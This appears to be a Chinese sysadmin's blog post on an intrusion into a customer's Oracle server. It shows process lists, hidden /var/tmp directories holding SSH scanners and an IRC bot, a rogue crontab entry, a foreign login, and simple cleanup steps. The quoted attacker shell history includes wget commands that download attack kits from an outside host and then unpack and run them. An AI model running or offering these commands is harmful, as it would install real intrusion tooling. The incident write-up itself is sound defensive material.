Hacker or NOT?

客户服务器可能遭到攻击(与我们之前预测一样),记录如下:
以root用户登录,su – oracle无法执行
查看进程,发现有大量scanssh进程

[[email protected] scripts]$ ps -ef
 oracle    5877     1  0 22:04 pts/1    00:00:00 ./scanssh
 oracle    5878     1  0 22:04 pts/1    00:00:00 ./scanssh
 oracle    5879     1  0 22:04 pts/1    00:00:00 ./scanssh
 oracle    5880     1  0 22:04 pts/1    00:00:00 ./scanssh
 oracle    5881     1  0 22:04 pts/1    00:00:00 ./scanssh
 oracle    5883     1  0 22:04 pts/1    00:00:00 ./scanssh
 oracle    5884     1  0 22:04 pts/1    00:00:00 ./scanssh
 oracle    5886     1  0 22:04 pts/1    00:00:00 ./scanssh
 oracle    5887     1  0 22:04 pts/1    00:00:00 ./scanssh
 oracle    5888     1  0 22:04 pts/1    00:00:01 ./scanssh
 oracle    5889     1  0 22:04 pts/1    00:00:00 ./scanssh
 省略部分

根据网上说明,发现/var/tmp目录下有两个奇怪的隐藏目录:

[[email protected] ~]$ cd /var/tmp/
 [[email protected] tmp]$ ls
 [[email protected] tmp]$ ll -a
 总计 32
 drwxrwxrwt  5 root   root     4096 05-08 03:06 .
 drwxr-xr-x 22 root   root     4096 03-29 17:12 ..
 drwxrwxrwt  2 root   root     4096 05-08 09:50 .oracle
 drwxr-xr-x  2 oracle oinstall 4096 05-08 22:04 .s
 drwxr-xr-x  3 oracle oinstall 4096 05-07 12:34 .system

[[email protected] tmp]$ cd .s
[[email protected] .s]$ ll  -a
总计 2876
drwxr-xr-x 2 oracle oinstall    4096 05-08 22:04 .
drwxrwxrwt 5 root   root        4096 05-08 03:06 ..
-rwxr-xr-x 1 oracle oinstall     224 04-08 22:26 a
-rw-r--r-- 1 oracle oinstall    8781 05-08 22:04 bios.txt
-rw-r--r-- 1 root   root          78 05-08 21:59 kill.sh
-rwxr-xr-x 1 oracle oinstall    2893 2006-11-05 mass
-rwxr-xr-x 1 oracle oinstall  443498 04-08 23:07 passfile
-rwxr-xr-x 1 oracle oinstall    5944 2005-05-16 pscan2
-rwxr-xr-x 1 oracle oinstall    5789 2007-08-03 pscan2.c
-rwxr-xr-x 1 oracle oinstall  719860 2006-10-28 scanner
-rwxr-xr-x 1 oracle oinstall 1446381 2010-07-22 scanssh
-rwxr-xr-x 1 oracle oinstall  249980 2001-02-13 screen
-rwxr-xr-x 1 oracle oinstall    1218 05-08 20:32 trueusers.txt

[[email protected] tmp]$ cd .system/
[[email protected] .system]$ ll -a
总计 576
drwxr-xr-x 3 oracle oinstall   4096 05-07 12:34 .
drwxrwxrwt 5 root   root       4096 05-08 03:06 ..
-rwxr-xr-x 1 oracle oinstall    323 2001-10-13 autorun
-rwxr-xr-x 1 oracle oinstall     49 2008-07-31 bash
-rw-r--r-- 1 oracle oinstall     53 05-07 12:18 cron.d
-rw-r--r-- 1 oracle oinstall     79 05-07 12:34 LinkEvents
-rw-r--r-- 1 oracle oinstall     17 05-07 12:18 m.dir
-rwxr-xr-x 1 oracle oinstall    172 05-08 22:00 mech
-rwxr-xr-x 1 oracle oinstall  22882 2003-05-16 m.help
-rwxr-xr-x 1 oracle oinstall   1043 05-08 22:00 m.lev
-rw------- 1 oracle oinstall      6 05-07 12:18 m.pid
-rw-r--r-- 1 oracle oinstall    378 05-08 22:00 m.ses
-rwxr-xr-x 1 oracle oinstall    747 05-07 12:18 m.set
-rwx--x--x 1 oracle oinstall 492135 2005-03-04 pp3-login
drwxr-xr-x 2 oracle oinstall   4096 03-13 09:51 r
-rwxr-xr-x 1 oracle oinstall     27 2009-02-13 start
-rwxr--r-- 1 oracle oinstall    178 05-07 12:18 y2kupdate

 

crontab中也有一个奇怪的自动执行计划,询问客户,其表示从没改过:

[[email protected] ~]$ crontab -l
* * * * * /var/tmp/.system/y2kupdate >/dev/null 2>&1

查询history,发现一部分奇怪的操作,询问客户,其再次表示没进行过操作:

 

912  passwd
 913  cd /var.tmp
 914  cd /var/tmp
 915  ls
 916  wget http://netsplit.webs.com/patrik.tgz
 917  tar zxvf patrik.tgz
 918  rm -rf patrik.tgz
 919  cd .system
 920  ls
 921  nano m.set
 922  ./autorun
 923  ./start #hacknet

 

968  uptime
 969  uptime
 970  cat /proc/cpuinfo
 971  cd /var/tmp
 972  ls -a
 973  wget http://netsplit.webs.com/io.tgz
 974  tar zxvf io.tgz
 975  rm -rf io.tgz
 976  cd .s
 977  ./a 60.6
 978  chmod +x *
 979  ./screen
 980  ls 
 981  cat trueusers.txt
 982  ./screen -r

 

查询登录记录,发现在最近两天有奇怪的登录记录,仅列举奇怪的几条:

[[email protected] backup]$ last | head -30
oracle   pts/1        :pts/0:S.0       Sun May  8 03:25 - 03:25  (00:00)    
oracle   pts/1        :pts/0:S.0       Sun May  8 03:17 - 03:17  (00:00)    
oracle   pts/0        188.24.196.48    Sat May  7 12:15 - 12:38  (00:23)

188.24.196.48这个IP经查询时罗马尼亚的

毕竟不是安全工程师,加之最近较忙,只能进行简单的处理,kill掉所有scanssh进程:

 

ps -ef | grep scanssh |awk '{print "kill -9 "$2}' > kill.sh

. kill.sh

 

删除.s和.system目录

普人特福的博客cnzz&51la for wordpress,cnzz for wordpress,51la for wordpress